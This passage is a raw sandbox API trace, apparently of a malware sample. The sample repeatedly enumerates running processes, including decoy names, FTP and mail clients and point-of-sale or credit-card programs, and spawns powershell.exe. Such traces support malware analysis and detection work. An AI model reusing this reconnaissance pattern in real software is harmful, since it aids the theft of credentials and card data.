pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0192.546] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0192.547] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0192.549] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0192.551] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0192.552] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0192.554] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0192.555] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0192.557] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0192.558] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0192.560] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0192.562] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0192.563] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0192.565] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0192.567] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0192.568] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0192.570] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0192.573] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0192.575] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0192.608] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0192.612] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0192.615] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0192.618] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0192.620] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0192.628] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0192.631] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0192.634] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0192.692] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0192.695] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0192.697] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0192.699] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0192.701] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0192.703] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0192.709] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0192.711] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0192.713] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0192.714] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0192.716] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0192.718] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0192.720] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0192.722] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0192.724] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0192.726] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0192.728] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0192.729] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0192.731] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0192.733] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0192.735] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0192.737] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0192.739] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0192.740] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0192.745] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0192.747] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0192.749] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0192.751] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0192.752] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0192.754] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0192.756] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0192.758] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0192.760] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0192.761] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0192.764] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0192.765] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0192.767] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0192.769] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0192.770] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0192.773] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0192.774] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0192.776] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0192.778] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0192.797] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0192.799] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xdd8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0192.800] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0192.802] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0192.803] CloseHandle (hObject=0x17ec) returned 1 [0192.804] Sleep (dwMilliseconds=0x64) [0192.805] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17ec [0192.821] Process32First (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0192.822] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0192.823] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0192.825] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0192.826] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0192.828] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0192.830] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0192.832] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0192.834] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, 